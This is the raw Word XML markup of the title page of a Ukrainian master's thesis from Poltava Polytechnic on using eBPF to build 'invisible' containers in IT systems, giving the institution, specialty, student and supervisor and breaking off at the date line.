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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Національний університет «Полтавська політехніка імені Юрія Кондратюка»</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u w:val="single"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Навчально-науковий інститут інформаційний технологій і робототехніки</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24"/>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>(повна</w:t>
      </w:r>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>назва</w:t>
      </w:r>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>інституту/факультету)</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sz w:val="15"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pP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u w:val="single"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Кафедра</w:t>
      </w:r>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>комп’ютерних та інформаційних технологій і систем</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18"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>(повна</w:t>
      </w:r>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>назва</w:t>
      </w:r>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>кафедри)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A11308" w:rsidRPr="003F4E1A" w:rsidRDefault="00A11308" w:rsidP="00A11308">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pP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sz w:val="20"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pP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sz w:val="26"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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Пояснювальна записка</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rPr>
        <w:t>д</w:t>
      </w:r>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>о дипломного проекту (роботи)</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lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>на</w:t>
      </w:r>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:spacing w:val="-3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>здобуття</w:t>
      </w:r>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>освітнього</w:t>
      </w:r>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:spacing w:val="-3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ступеня</w:t>
      </w:r>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:spacing w:val="-3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="004C4D9D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>магістр</w:t>
      </w:r>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>»</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u w:val="single"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Спеціальність</w:t>
      </w:r>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>123</w:t>
      </w:r>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>«Комп’ютерна інженерія»</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14"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>(код і</w:t>
      </w:r>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="14"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>назва)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A11308" w:rsidRPr="003F4E1A" w:rsidRDefault="00A11308" w:rsidP="00A11308">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="54"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>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lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>на тему</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rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="001B4111" w:rsidRPr="001B4111">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Інтеграція </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001B4111" w:rsidRPr="001B4111">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001B4111" w:rsidRPr="001B4111">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> для побудови невидимих кон</w:t>
      </w:r>
      <w:r w:rsidR="001B4111">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>тейнерів в сучасних ІТ системах</w:t>
      </w:r>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>»</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
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="3544" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5811"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A11308" w:rsidRPr="003F4E1A" w:rsidTr="007372C7">
        <w:trPr>
          <w:trHeight w:val="302"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5811" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00A11308" w:rsidRPr="003F4E1A" w:rsidRDefault="003E765A" w:rsidP="00C727FC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:u w:val="single"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>Виконав</w:t>
            </w:r>
            <w:r w:rsidR="00A11308" w:rsidRPr="003F4E1A">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve">: студент </w:t>
            </w:r>
            <w:r w:rsidR="00C727FC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:u w:val="single"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve">6 курсу, групи 601 </w:t>
            </w:r>
            <w:r w:rsidR="00A11308" w:rsidRPr="003F4E1A">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:u w:val="single"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>ТК</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A11308" w:rsidRPr="003F4E1A" w:rsidTr="007372C7">
        <w:trPr>
          <w:trHeight w:val="317"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5811" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00A11308" w:rsidRPr="003F4E1A" w:rsidRDefault="00A11308" w:rsidP="007372C7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>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lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve">Спеціальності 123 </w:t>
            </w:r>
            <w:r w:rsidRPr="003E765A">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:u w:val="single"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>«Комп’ютерна інженерія»</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A11308" w:rsidRPr="003F4E1A" w:rsidTr="007372C7">
        <w:trPr>
          <w:trHeight w:val="302"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5811" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00A11308" w:rsidRPr="003F4E1A" w:rsidRDefault="00A11308" w:rsidP="004C4D9D">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="2016"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003F4E1A">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>(шифр і назва спеціальності)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A11308" w:rsidRPr="003F4E1A" w:rsidTr="007372C7">
        <w:trPr>
          <w:trHeight w:val="302"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5811" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00A11308" w:rsidRPr="003F4E1A" w:rsidRDefault="005A4215" w:rsidP="003E765A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>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u w:val="single"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>Бакай Роман Андрійович</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A11308" w:rsidRPr="003F4E1A" w:rsidTr="007372C7">
        <w:trPr>
          <w:trHeight w:val="317"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5811" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00A11308" w:rsidRPr="003F4E1A" w:rsidRDefault="00A11308" w:rsidP="005A4215">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:hanging="2234"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003F4E1A">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>(прізвище та ініціали)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A11308" w:rsidRPr="003F4E1A" w:rsidTr="007372C7">
        <w:trPr>
          <w:trHeight w:val="302"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5811" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00A11308" w:rsidRPr="003F4E1A" w:rsidRDefault="00A11308" w:rsidP="005A4215">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>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lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve">Керівник </w:t>
            </w:r>
            <w:r w:rsidR="005A4215">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:u w:val="single"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>Фесенко Тетяна Григорівна</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A11308" w:rsidRPr="003F4E1A" w:rsidTr="007372C7">
        <w:trPr>
          <w:trHeight w:val="302"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5811" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00A11308" w:rsidRPr="003F4E1A" w:rsidRDefault="00A11308" w:rsidP="003E765A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="2160"/>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16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>(прізвище та ініціали)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A11308" w:rsidRPr="003F4E1A" w:rsidTr="007372C7">
        <w:trPr>
          <w:trHeight w:val="317"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5811" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00A11308" w:rsidRPr="003F4E1A" w:rsidRDefault="00A11308" w:rsidP="007372C7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>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lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>Рецензент____________________________</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A11308" w:rsidRPr="003F4E1A" w:rsidTr="007372C7">
        <w:trPr>
          <w:trHeight w:val="302"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5811" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00A11308" w:rsidRPr="003F4E1A" w:rsidRDefault="00A11308" w:rsidP="007372C7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="2341"/>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16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>(прізвище та ініціали)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A11308" w:rsidRPr="003F4E1A"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Полтава</w:t>
      </w:r>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:spacing w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0074604D">
        <w:rPr>
